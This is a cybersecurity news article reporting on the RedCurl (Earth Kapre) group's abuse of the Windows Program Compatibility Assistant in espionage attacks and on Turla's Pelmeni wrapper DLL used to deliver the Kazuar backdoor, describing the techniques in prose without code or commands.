.jpg "Malware")
He called the Russian-speaking cybercrime group RedCurl is exploiting a legitimate component of Microsoft Windows called Program Compatibility Assistant (PCA) to execute malicious commands.
“The Program Compatibility Assistant (pcalua.exe) is a Windows service designed to identify and resolve compatibility issues with older programs,” Trend Micro said in an analysis published this month.
“Hackers can exploit this utility to allow command execution and bypass security restrictions by using it as an alternative command line interpreter. In this investigation, the threat actor uses this tool to obscure their activities.”
RedCurl, also called Earth Kapre and Red Wolf, is known to have been active since at least 2018, orchestrating corporate cyber espionage attacks against entities located in Australia, Canada, Germany, Russia, Slovenia, the United Kingdom, Ukraine, and the United States.
In July 2023, the FACCT revealed that a major Russian bank and an Australian company were targeted by the threat actor in November 2022 and May 2023 to steal confidential company secrets and employee information.
The attack chain examined by Trend Micro involves using phishing emails containing malicious attachments (.ISO and .IMG files) to trigger a multi-step process that begins with using cmd.exe to remotely download a legitimate utility called curl server, which then acts as a conduit to deliver a loader (ms.dll or ps.dll).
The malicious DLL file, in turn, leverages PCA to generate a download process that takes care of establishing a connection to the same domain that curl uses to retrieve the loader.
The use of the open source software Impacket to execute unauthorized commands was also used in the attack.
Connections to Earth Kapre arise from overlaps in the command and control (C2) infrastructure and similarities to known downloader artifacts used by the group.
“This case highlights the ongoing and active threat posed by Earth Kapre, an actor targeting a broad range of industries across multiple countries,” Trend Micro said.
“The perpetrator uses sophisticated tactics, such as abusing PowerShell, curl, and Program Compatibility Assistant (pcalua.exe) to execute malicious commands, demonstrating his dedication to evading detection within the targeted networks.”
The development comes as the Russian state group known as Turla (aka Iron Hunter, Pensive Ursa, Secret Blizzard, Snake, Uroburos, Venomous Bear and Waterbug) has begun using a new wrapper DLL codenamed Pelmeni to distribute the package based on .NET Kazuar’s Back Door.
Pelmeni, which masquerades as libraries related to SkyTel, NVIDIA GeForce Experience, vncutil or ASUS, is loaded via sideloading DLL. Once this fake DLL is called by legitimate software installed on the machine, it decrypts and launches Kazuar, Lab52 said.